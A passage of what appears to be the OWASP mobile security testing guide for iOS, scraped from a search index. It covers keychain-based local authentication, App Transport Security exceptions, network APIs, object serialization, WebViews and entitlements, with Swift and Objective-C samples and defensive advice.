The last three options consist of using hardcoded encryption keys in the source code, having a predictable key derivation function based on stable attributes, and storing generated keys in places that are shared with other applications. Using hardcoded encryption keys is obviously not the way to go, as this would mean that every instance of the application uses the same encryption key. An attacker needs only to do the work once in order to extract the key from the source code (whether stored natively or in Objective-C/Swift). Consequently, the attacker can decrypt any other data that was encrypted by the application. Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device in order to find the key. Lastly, storing symmetric encryption keys publicly also is highly discouraged.
Two more notions you should never forget when it comes to cryptography:
Apple provides a Randomization Services API, which generates cryptographically secure random numbers.
The Randomization Services API uses the SecRandomCopyBytes
function to generate numbers. This is a wrapper function for the /dev/random
device file, which provides cryptographically secure pseudorandom values from 0 to 255. Make sure that all random numbers are generated with this API. There is no reason for developers to use a different one.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
A variety of methods are available for integrating local authentication into apps. The Local Authentication framework provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the keychain for implementing local authentication.
Fingerprint authentication on iOS is known as Touch ID. The fingerprint ID sensor is operated by the SecureEnclave security coprocessor and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced Face ID: which allows authentication based on facial recognition. Both use similar APIs on an application level, the actual method of storing the data and retrieving the data (e.g. facial data or fingerprint related data is different).
Developers have two options for incorporating Touch ID/Face ID authentication:
LocalAuthentication.framework
is a high-level API that can be used to authenticate the user via Touch ID. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.Security.framework
is a lower level API to access keychain services. This is a secure option if your app needs to protect some secret data with biometric authentication, since the access control is managed on a system-level and can not easily be bypassed. Security.framework
has a C API, but there are several open source wrappers available, making access to the keychain as simple as to NSUserDefaults. Security.framework
underlies LocalAuthentication.framework
; Apple recommends to default to higher-level APIs whenever possible.Please be aware that using either the LocalAuthentication.framework
or the Security.framework
, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See Don't touch me that way, by David Lindner et al for more details.
The Local Authentication framework provides facilities for requesting a passphrase or Touch ID authentication from users. Developers can display and utilize an authentication prompt by utilizing the function evaluatePolicy
of the LAContext
class.
Two available policies define acceptable forms of authentication:
deviceOwnerAuthentication
(Swift) or LAPolicyDeviceOwnerAuthentication
(Objective-C): When available, the user is prompted to perform Touch ID authentication. If Touch ID is not activated, the device passcode is requested instead. If the device passcode is not enabled, policy evaluation fails.
deviceOwnerAuthenticationWithBiometrics
(Swift) or LAPolicyDeviceOwnerAuthenticationWithBiometrics
(Objective-C): Authentication is restricted to biometrics where the user is prompted for Touch ID.
The evaluatePolicy
function returns a boolean value indicating whether the user has authenticated successfully.
The Apple Developer website offers code samples for both Swift and Objective-C. A typical implementation in Swift looks as follows.
let context = LAContext()\nvar error: NSError?\n\nguard context.canEvaluatePolicy(.deviceOwnerAuthentication, error: &error) else {\n // Could not evaluate policy; look at error and present an appropriate message to user\n}\n\ncontext.evaluatePolicy(.deviceOwnerAuthentication, localizedReason: \"Please, pass authorization to enter this area\") { success, evaluationError in\n guard success else {\n // User did not authenticate successfully, look at evaluationError and take appropriate action\n }\n\n // User authenticated successfully, take appropriate action\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#using-keychain-services-for-local-authentication","title":"Using Keychain Services for Local Authentication","text":"The iOS keychain APIs can (and should) be used to implement local authentication. During this process, the app stores either a secret authentication token or another piece of secret data identifying the user in the keychain. In order to authenticate to a remote service, the user must unlock the keychain using their passphrase or fingerprint to obtain the secret data.
The keychain allows saving items with the special SecAccessControl
attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string \"test_strong_password\" to the keychain. The string can be accessed only on the current device while the passcode is set (kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
parameter) and after Touch ID authentication for the currently enrolled fingers only (SecAccessControlCreateFlags.biometryCurrentSet
parameter):
// 1. Create the AccessControl object that will represent authentication settings\n\nvar error: Unmanaged<CFError>?\n\nguard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n SecAccessControlCreateFlags.biometryCurrentSet,\n &error) else {\n // failed to create AccessControl object\n\n return\n}\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\n\nvar query: [String: Any] = [:]\n\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecAttrAccount as String] = \"OWASP Account\" as CFString\nquery[kSecValueData as String] = \"test_strong_password\".data(using: .utf8)! as CFData\nquery[kSecAttrAccessControl as String] = accessControl\n\n// 3. Save the item\n\nlet status = SecItemAdd(query as CFDictionary, nil)\n\nif status == noErr {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nvar query = [String: Any]()\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecReturnData as String] = kCFBooleanTrue\nquery[kSecAttrAccount as String] = \"My Name\" as CFString\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecUseOperationPrompt as String] = \"Please, pass authorisation to enter this area\" as CFString\n\n// 6. Get the item\nvar queryResult: AnyObject?\nlet status = withUnsafeMutablePointer(to: &queryResult) {\n SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0))\n}\n\nif status == noErr {\n let password = String(data: queryResult as! Data, encoding: .utf8)!\n // successfully received password\n} else {\n // authorization not passed\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#objective-c","title":"Objective-C","text":"// 1. Create the AccessControl object that will represent authentication settings\nCFErrorRef *err = nil;\n\nSecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n kSecAccessControlUserPresence,\n err);\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\nNSDictionary* query = @{\n (_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecAttrAccount: @\"OWASP Account\",\n (__bridge id)kSecValueData: [@\"test_strong_password\" dataUsingEncoding:NSUTF8StringEncoding],\n (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef\n};\n\n// 3. Save the item\nOSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil);\n\nif (status == noErr) {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nNSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecReturnData: @YES,\n (__bridge id)kSecAttrAccount: @\"My Name1\",\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecUseOperationPrompt: @\"Please, pass authorisation to enter this area\" };\n\n// 6. Get the item\nCFTypeRef queryResult = NULL;\nOSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult);\n\nif (status == noErr){\n NSData* resultData = ( __bridge_transfer NSData* )queryResult;\n NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];\n NSLog(@\"%@\", password);\n} else {\n NSLog(@\"Something went wrong\");\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#note-regarding-temporariness-of-keys-in-the-keychain","title":"Note regarding temporariness of keys in the Keychain","text":"Unlike macOS and Android, iOS does not support temporariness of an item's accessibility in the keychain: when there is no additional security check when entering the keychain (e.g. kSecAccessControlUserPresence
or similar is set), then once the device is unlocked, a key will be accessible.
Almost every iOS app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#ios-app-transport-security","title":"iOS App Transport Security","text":"Starting with iOS 9, Apple introduced App Transport Security (ATS) which is a set of security checks enforced by the operating system for connections made using the URL Loading System (typically via URLSession
) to always use HTTPS. Apps should follow Apple's best practices to properly secure their connections.
Watch ATS Introductory Video from the Apple WWDC 2015.
ATS performs default server trust evaluation and requires a minimum set of security requirements.
Default Server Trust Evaluation:
When an app connects to a remote server, the server provides its identity using an X.509 digital certificate. The ATS default server trust evaluation includes validating that the certificate:
Minimum Security Requirements for Connections:
ATS will block connections that further fail to meet a set of minimum security requirements including:
Certificate validity checking:
According to Apple, \"evaluating the trusted status of a TLS certificate is performed in accordance with established industry standards, as set out in RFC 5280, and incorporates emerging standards such as RFC 6962 (Certificate Transparency). In iOS 11 or later, Apple devices are periodically updated with a current list of revoked and constrained certificates. The list is aggregated from certificate revocation lists (CRLs), which are published by each of the built-in root certificate authorities trusted by Apple, as well as by their subordinate CA issuers. The list may also include other constraints at Apple\u2019s discretion. This information is consulted whenever a network API function is used to make a secure connection. If there are too many revoked certificates from a CA to list individually, a trust evaluation may instead require that an online certificate status response (OCSP) is needed, and if the response isn\u2019t available, the trust evaluation will fail.\"
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#when-does-ats-not-apply","title":"When does ATS not apply?","text":"When using lower-level APIs: ATS only applies to the URL Loading System including URLSession and APIs layered on top of them. It does not apply to apps that use lower-level APIs (like BSD Sockets), including those that implement TLS on top of those lower-level APIs (see section \"Using ATS in Apple Frameworks\" from the Archived Apple Developer Documentation).
When connecting to IP addresses, unqualified domain names or local hosts: ATS applies only to connections made to public host names (see section \"Availability of ATS for Remote and Local Connections\" from the Archived Apple Developer Documentation). The system does not provide ATS protection to connections made to:
When including ATS Exceptions: If the app uses the ATS compatible APIs, it can still disable ATS for specific scenarios using ATS Exceptions.
Learn more:
ATS restrictions can be disabled by configuring exceptions in the Info.plist
file under the NSAppTransportSecurity
key. These exceptions can be applied to:
ATS exceptions can be applied globally or per domain basis. The application can globally disable ATS, but opt in for individual domains. The following listing from Apple Developer documentation shows the structure of the NSAppTransportSecurity
dictionary.
NSAppTransportSecurity : Dictionary {\n NSAllowsArbitraryLoads : Boolean\n NSAllowsArbitraryLoadsForMedia : Boolean\n NSAllowsArbitraryLoadsInWebContent : Boolean\n NSAllowsLocalNetworking : Boolean\n NSExceptionDomains : Dictionary {\n <domain-name-string> : Dictionary {\n NSIncludesSubdomains : Boolean\n NSExceptionAllowsInsecureHTTPLoads : Boolean\n NSExceptionMinimumTLSVersion : String\n NSExceptionRequiresForwardSecrecy : Boolean // Default value is YES\n NSRequiresCertificateTransparency : Boolean\n }\n }\n}\n
Source: Apple Developer Documentation.
The following table summarizes the global ATS exceptions. For more information about these exceptions, please refer to table 2 in the official Apple developer documentation.
Key DescriptionNSAllowsArbitraryLoads
Disable ATS restrictions globally excepts for individual domains specified under NSExceptionDomains
NSAllowsArbitraryLoadsInWebContent
Disable ATS restrictions for all the connections made from web views NSAllowsLocalNetworking
Allow connection to unqualified domain names and .local domains NSAllowsArbitraryLoadsForMedia
Disable all ATS restrictions for media loaded through the AV Foundations framework The following table summarizes the per-domain ATS exceptions. For more information about these exceptions, please refer to table 3 in the official Apple developer documentation.
Key DescriptionNSIncludesSubdomains
Indicates whether ATS exceptions should apply to subdomains of the named domain NSExceptionAllowsInsecureHTTPLoads
Allows HTTP connections to the named domain, but does not affect TLS requirements NSExceptionMinimumTLSVersion
Allows connections to servers with TLS versions less than 1.2 NSExceptionRequiresForwardSecrecy
Disable perfect forward secrecy (PFS) Justifying Exceptions:
Starting from January 1 2017, Apple App Store review requires justification if one of the following ATS exceptions are defined.
NSAllowsArbitraryLoads
NSAllowsArbitraryLoadsForMedia
NSAllowsArbitraryLoadsInWebContent
NSExceptionAllowsInsecureHTTPLoads
NSExceptionMinimumTLSVersion
This must be carefully revised to determine if it's indeed part of the app intended purpose. Apple warns about exceptions reducing the security of the apps and advises to configure exceptions only when needed and prefer to server fixes when faced with an ATS failure.
Example:
In the following example, ATS is globally enabled (there's no global NSAllowsArbitraryLoads
defined) but an exception is explicitly set for the example.com
domain (and its subdomains). Considering that the domain is owned by the application developers and there's a proper justification this exception would be acceptable, since it maintains all the benefits of ATS for all other domains. However, it would be always preferable to fix the server as indicated above.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSExceptionDomains</key>\n <dict>\n <key>example.com</key>\n <dict>\n <key>NSIncludesSubdomains</key>\n <true/>\n <key>NSExceptionMinimumTLSVersion</key>\n <string>TLSv1.2</string>\n <key>NSExceptionAllowsInsecureHTTPLoads</key>\n <true/>\n <key>NSExceptionRequiresForwardSecrecy</key>\n <true/>\n </dict>\n </dict>\n</dict>\n
For more information on ATS exceptions please consult section \"Configure Exceptions Only When Needed; Prefer Server Fixes\" from the article \"Preventing Insecure Network Connections\" in the Apple Developer Documentation and the blog post on ATS.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#server-trust-evaluation","title":"Server Trust Evaluation","text":"ATS imposes extended security checks that supplement the default server trust evaluation prescribed by the Transport Layer Security (TLS) protocol. Loosening ATS restrictions reduces the security of the app. Apps should prefer alternative ways to improve server security before adding ATS exceptions.
The Apple Developer Documentation explains that an app can use URLSession
to automatically handle server trust evaluation. However, apps are also able to customize that process, for example they can:
References:
Since iOS 12.0 the Network framework and the URLSession
class provide methods to load network and URL requests asynchronously and synchronously. Older iOS versions can utilize the Sockets API.
The Network
framework was introduced at The Apple Worldwide Developers Conference (WWDC) in 2018 and is a replacement to the Sockets API. This low-level networking framework provides classes to send and receive data with built in dynamic networking, security and performance support.
TLS 1.3 is enabled by default in the Network
framework, if the argument using: .tls
is used. It is the preferred option over the legacy Secure Transport framework.
URLSession
was built upon the Network
framework and utilizes the same transport services. The class also uses TLS 1.3 by default, if the endpoint is HTTPS.
URLSession
should be used for HTTP and HTTPS connections, instead of utilizing the Network
framework directly. The URLSession
class natively supports both URL schemes and is optimized for such connections. It requires less boilerplate code, reducing the possibility for errors and ensuring secure connections by default. The Network
framework should only be used when there are low-level and/or advanced networking requirements.
The official Apple documentation includes examples of using the Network
framework to implement netcat and URLSession
to fetch website data into memory.
Enforced updating can be helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Additionally, vulnerabilities are easily patched by means of forced updates.
The challenge with iOS however, is that Apple does not provide any APIs yet to automate this process, instead, developers will have to create their own mechanism, such as described at various blogs which boil down to looking up properties of the app using http://itunes.apple.com/lookup\\?id\\<BundleId>
or third party libraries, such as Siren and react-native-appstore-version-checker. Most of these implementations will require a certain given version offered by an API or just \"latest in the appstore\", which means users can be frustrated with having to update the app, even though no business/security need for an update is truly there.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on iOS:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-encoding","title":"Object Encoding","text":"iOS comes with two protocols for object encoding and decoding for Objective-C or NSObject
s: NSCoding
and NSSecureCoding
. When a class conforms to either of the protocols, the data is serialized to NSData
: a wrapper for byte buffers. Note that Data
in Swift is the same as NSData
or its mutable counterpart: NSMutableData
. The NSCoding
protocol declares the two methods that must be implemented in order to encode/decode its instance-variables. A class using NSCoding
needs to implement NSObject
or be annotated as an @objc class. The NSCoding
protocol requires to implement encode and init as shown below.
class CustomPoint: NSObject, NSCoding {\n\n //required by NSCoding:\n func encode(with aCoder: NSCoder) {\n aCoder.encode(x, forKey: \"x\")\n aCoder.encode(name, forKey: \"name\")\n }\n\n var x: Double = 0.0\n var name: String = \"\"\n\n init(x: Double, name: String) {\n self.x = x\n self.name = name\n }\n\n // required by NSCoding: initialize members using a decoder.\n required convenience init?(coder aDecoder: NSCoder) {\n guard let name = aDecoder.decodeObject(forKey: \"name\") as? String\n else {return nil}\n self.init(x:aDecoder.decodeDouble(forKey:\"x\"),\n name:name)\n }\n\n //getters/setters/etc.\n}\n
The issue with NSCoding
is that the object is often already constructed and inserted before you can evaluate the class-type. This allows an attacker to easily inject all sorts of data. Therefore, the NSSecureCoding
protocol has been introduced. When conforming to NSSecureCoding
you need to include:
static var supportsSecureCoding: Bool {\n return true\n}\n
when init(coder:)
is part of the class. Next, when decoding the object, a check should be made, e.g.:
let obj = decoder.decodeObject(of:MyClass.self, forKey: \"myKey\")\n
The conformance to NSSecureCoding
ensures that objects being instantiated are indeed the ones that were expected. However, there are no additional integrity checks done over the data and the data is not encrypted. Therefore, any secret data needs additional encryption and data of which the integrity must be protected, should get an additional HMAC.
Note, when NSData
(Objective-C) or the keyword let
(Swift) is used: then the data is immutable in memory and cannot be easily removed.
NSKeyedArchiver
is a concrete subclass of NSCoder
and provides a way to encode objects and store them in a file. The NSKeyedUnarchiver
decodes the data and recreates the original data. Let's take the example of the NSCoding
section and now archive and unarchive them:
// archiving:\nNSKeyedArchiver.archiveRootObject(customPoint, toFile: \"/path/to/archive\")\n\n// unarchiving:\nguard let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile(\"/path/to/archive\") as?\n CustomPoint else { return nil }\n
When decoding a keyed archive, because values are requested by name, values can be decoded out of sequence or not at all. Keyed archives, therefore, provide better support for forward and backward compatibility. This means that an archive on disk could actually contain additional data which is not detected by the program, unless the key for that given data is provided at a later stage.
Note that additional protection needs to be in place to secure the file in case of confidential data, as the data is not encrypted within the file. See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#codable","title":"Codable","text":"With Swift 4, the Codable
type alias arrived: it is a combination of the Decodable
and Encodable
protocols. A String
, Int
, Double
, Date
, Data
and URL
are Codable
by nature: meaning they can easily be encoded and decoded without any additional work. Let's take the following example:
struct CustomPointStruct:Codable {\n var x: Double\n var name: String\n}\n
By adding Codable
to the inheritance list for the CustomPointStruct
in the example, the methods init(from:)
and encode(to:)
are automatically supported. Fore more details about the workings of Codable
check the Apple Developer Documentation. The Codable
s can easily be encoded / decoded into various representations: NSData
using NSCoding
/NSSecureCoding
, JSON, Property Lists, XML, etc. See the subsections below for more details.
There are various ways to encode and decode JSON within iOS by using different 3rd party libraries:
The libraries differ in their support for certain versions of Swift and Objective-C, whether they return (im)mutable results, speed, memory consumption and actual library size. Again, note in case of immutability: confidential information cannot be removed from memory easily.
Next, Apple provides support for JSON encoding/decoding directly by combining Codable
together with a JSONEncoder
and a JSONDecoder
:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n}\n\nlet encoder = JSONEncoder()\nencoder.outputFormatting = .prettyPrinted\n\nlet test = CustomPointStruct(point: 10, name: \"test\")\nlet data = try encoder.encode(test)\nlet stringData = String(data: data, encoding: .utf8)\n\n// stringData = Optional ({\n// \"point\" : 10,\n// \"name\" : \"test\"\n// })\n
JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#property-lists-and-codable","title":"Property Lists and Codable","text":"You can persist objects to property lists (also called plists in previous sections). You can find two examples below of how to use it:
// archiving:\nlet data = NSKeyedArchiver.archivedDataWithRootObject(customPoint)\nNSUserDefaults.standardUserDefaults().setObject(data, forKey: \"customPoint\")\n\n// unarchiving:\n\nif let data = NSUserDefaults.standardUserDefaults().objectForKey(\"customPoint\") as? NSData {\n let customPoint = NSKeyedUnarchiver.unarchiveObjectWithData(data)\n}\n
In this first example, the NSUserDefaults
are used, which is the primary property list. We can do the same with the Codable
version:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n }\n\n var points: [CustomPointStruct] = [\n CustomPointStruct(point: 1, name: \"test\"),\n CustomPointStruct(point: 2, name: \"test\"),\n CustomPointStruct(point: 3, name: \"test\"),\n ]\n\n UserDefaults.standard.set(try? PropertyListEncoder().encode(points), forKey: \"points\")\n if let data = UserDefaults.standard.value(forKey: \"points\") as? Data {\n let points2 = try? PropertyListDecoder().decode([CustomPointStruct].self, from: data)\n }\n
Note that plist
files are not meant to store secret information. They are designed to hold user preferences for an app.
There are multiple ways to do XML encoding. Similar to JSON parsing, there are various third party libraries, such as:
They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See XXE in the Apple iOS Office viewer as an example. Therefore, it is key to disable external entity parsing if possible. See the OWASP XXE prevention cheatsheet for more details. Next to the libraries, you can make use of Apple's XMLParser
class
When not using third party libraries, but Apple's XMLParser
, be sure to let shouldResolveExternalEntities
return false
.
There are various ORM-like solutions for iOS. The first one is Realm, which comes with its own storage engine. Realm has settings to encrypt the data as explained in Realm's documentation. This allows for handling secure data. Note that the encryption is turned off by default.
Apple itself supplies CoreData
, which is well explained in the Apple Developer Documentation. It supports various storage backends as described in Apple's Persistent Store Types and Behaviors documentation. The issue with the storage backends recommended by Apple, is that none of the type of data stores is encrypted, nor checked for integrity. Therefore, additional actions are necessary in case of confidential data. An alternative can be found in project iMas, which does supply out of the box encryption.
Protocol Buffers by Google, are a platform- and language-neutral mechanism for serializing structured data by means of the Binary Data Format. They are available for iOS by means of the Protobuf library. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality as no built-in encryption is available.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#webviews","title":"WebViews","text":"WebViews are in-app browser components for displaying interactive web content. They can be used to embed web content directly into an app's user interface. iOS WebViews support JavaScript execution by default, so script injection and Cross-Site Scripting attacks can affect them.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#types-of-webviews","title":"Types of WebViews","text":"There are multiple ways to include a WebView in an iOS application:
UIWebView
WKWebView
SFSafariViewController
UIWebView
is deprecated starting on iOS 12 and should not be used. Make sure that either WKWebView
or SFSafariViewController
are used to embed web content. In addition to that, JavaScript cannot be disabled for UIWebView
which is another reason to refrain from using it.
WKWebView
was introduced with iOS 8 and is the appropriate choice for extending app functionality, controlling displayed content (i.e., prevent the user from navigating to arbitrary URLs) and customizing.
WKWebView
comes with several security advantages over UIWebView
:
javaScriptEnabled
property of WKWebView
, it can be completely disabled, preventing all script injection flaws.JavaScriptCanOpenWindowsAutomatically
can be used to prevent JavaScript from opening new windows, such as pop-ups.hasOnlySecureContent
property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.WKWebView
implements out-of-process rendering, so memory corruption bugs won't affect the main app process.A JavaScript Bridge can be enabled when using WKWebView
and UIWebView
. See Section \"Native Functionality Exposed Through WebViews\" below for more information.
SFSafariViewController
is available starting on iOS 9 and should be used to provide a generalized web viewing experience. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
There are a couple of things to consider:
SFSafariViewController
and this is one of the reasons why the usage of WKWebView
is recommended when the goal is extending the app's user interface.SFSafariViewController
also shares cookies and other website data with Safari.SFSafariViewController
are not visible to the app, which cannot access AutoFill data, browsing history, or website data.SFSafariViewController
s may not be hidden or obscured by other views or layers.This should be sufficient for an app analysis and therefore, SFSafariViewController
s are out of scope for the Static and Dynamic Analysis sections.
Enabling Safari web inspection on iOS allows you to inspect the contents of a WebView remotely from a macOS device. By default, you can view the contents of any page loaded into the Safari app because the Safari app has the get-task-allowed
entitlement. Applications installed from the App store will however not have this entitlement, and so cannot be attached to. On jailbroken devices, this entitlement can be added to any application by installing the Inspectorplus tweak from the BigBoss repo.
Enabling the Safari Web Inspector is especially interesting in applications that expose native APIs using a JavaScript bridge, for example in hybrid applications.
To activate the web inspection you have to follow these steps:
To open the web inspector and debug a WebView:
Now you're able to debug the WebView as you would with a regular web page on your desktop browser.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#native-functionality-exposed-through-webviews","title":"Native Functionality Exposed Through WebViews","text":"In iOS 7, Apple introduced APIs that allow communication between the JavaScript runtime in the WebView and the native Swift or Objective-C objects. If these APIs are used carelessly, important functionality might be exposed to attackers who manage to inject malicious scripts into the WebView (e.g., through a successful Cross-Site Scripting attack).
Both UIWebView
and WKWebView
provide a means of communication between the WebView and the native app. Any important data or native functionality exposed to the WebView JavaScript engine would also be accessible to rogue JavaScript running in the WebView.
UIWebView:
There are two fundamental ways of how native code and JavaScript can communicate:
JSContext
, JavaScriptCore automatically wraps the block in a JavaScript function.JSExport
-inherited protocol are mapped to JavaScript objects that are available to all JavaScript code. Modifications of objects that are in the JavaScript environment are reflected in the native environment.Note that only class members defined in the JSExport
protocol are made accessible to JavaScript code.
WKWebView:
JavaScript code in a WKWebView
can still send messages back to the native app but in contrast to UIWebView
, it is not possible to directly reference the JSContext
of a WKWebView
. Instead, communication is implemented using a messaging system and using the postMessage
function, which automatically serializes JavaScript objects into native Objective-C or Swift objects. Message handlers are configured using the method add(_ scriptMessageHandler:name:)
.
In contrast to Android, where each app runs on its own user ID, iOS makes all third-party apps run under the non-privileged mobile
user. Each app has a unique home directory and is sandboxed, so that they cannot access protected system resources or files stored by the system or by other apps. These restrictions are implemented via sandbox policies (aka. profiles), which are enforced by the Trusted BSD (MAC) Mandatory Access Control Framework via a kernel extension. iOS applies a generic sandbox profile to all third-party apps called container. Access to protected resources or data (some also known as app capabilities) is possible, but it's strictly controlled via special permissions known as entitlements.
Some permissions can be configured by the app's developers (e.g. Data Protection or Keychain Sharing) and will directly take effect after the installation. However, for others, the user will be explicitly asked the first time the app attempts to access a protected resource, for example:
Even though Apple urges to protect the privacy of the user and to be very clear on how to ask permissions, it can still be the case that an app requests too many of them for non-obvious reasons.
Verifying the use of some permissions such as Camera, Photos, Calendar Data, Motion, Contacts or Speech Recognition should be pretty straightforward as it should be obvious if the app requires them to fulfill its tasks. Let's consider the following examples regarding the Photos permission, which, if granted, gives the app access to all user photos in the \"Camera Roll\" (the iOS default system-wide location for storing photos):
UIImagePickerController
(iOS 11+) and its modern replacement PHPickerViewController
(iOS 14+). These APIs run on a separate process from your app and by using them, the app gets read-only access exclusively to the images selected by the user instead of to the whole \"Camera Roll\". This is considered a best practice to avoid requesting unnecessary permissions.Verifying other permissions like Bluetooth or Location require a deeper source code inspection. They may be required for the app to properly function but the data being handled by those tasks might not be properly protected.
When collecting or simply handling (e.g. caching) sensitive data, an app should provide proper mechanisms to give the user control over it, e.g. to be able to revoke access or to delete it. However, sensitive data might not only be stored or cached but also sent over the network. In both cases, it has to be ensured that the app properly follows the appropriate best practices, which in this case involve implementing proper data protection and transport security. More information on how to protect this kind of data can be found in the chapter \"Network APIs\".
As you can see, using app capabilities and permissions mostly involve handling personal data, therefore being a matter of protecting the user's privacy. See the articles \"Protecting the User's Privacy\" and \"Accessing Protected Resources\" in Apple Developer Documentation for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#device-capabilities","title":"Device Capabilities","text":"Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the Info.plist
file of the app under the UIRequiredDeviceCapabilities
key.
<key>UIRequiredDeviceCapabilities</key>\n<array>\n <string>arm64</string>\n</array>\n
Typically you'll find the arm64
capability, meaning that the app is compiled for the arm64 instruction set.
For example, an app might be completely dependent on NFC to work (e.g. a \"NFC Tag Reader\" app). According to the archived iOS Device Compatibility Reference, NFC is only available starting on the iPhone 7 (and iOS 11). A developer might want to exclude all incompatible devices by setting the nfc
device capability.
Regarding testing, you can consider UIRequiredDeviceCapabilities
as a mere indication that the app is using some specific resources. Unlike the entitlements related to app capabilities, device capabilities do not confer any right or access to protected resources. Additional configuration steps might be required for that, which are very specific to each capability.
For example, if BLE is a core feature of the app, Apple's Core Bluetooth Programming Guide explains the different things to be considered:
bluetooth-le
device capability can be set in order to restrict non-BLE capable devices from downloading their app.bluetooth-peripheral
or bluetooth-central
(both UIBackgroundModes
) should be added if BLE background processing is required.However, this is not yet enough for the app to get access to the Bluetooth peripheral, the NSBluetoothPeripheralUsageDescription
key has to be included in the Info.plist
file, meaning that the user has to actively give permission. See \"Purpose Strings in the Info.plist File\" below for more information.
According to Apple's iOS Security Guide:
Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can\u2019t be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
Many entitlements can be set using the \"Summary\" tab of the Xcode target editor. Other entitlements require editing a target\u2019s entitlements property list file or are inherited from the iOS provisioning profile used to run the app.
Entitlement Sources:
Entitlement Destinations:
The Apple Developer Documentation also explains:
embedded.mobileprovision
).For example, if you want to set the \"Default Data Protection\" capability, you would need to go to the Capabilities tab in Xcode and enable Data Protection. This is directly written by Xcode to the <appname>.entitlements
file as the com.apple.developer.default-data-protection
entitlement with default value NSFileProtectionComplete
. In the IPA we might find this in the embedded.mobileprovision
as:
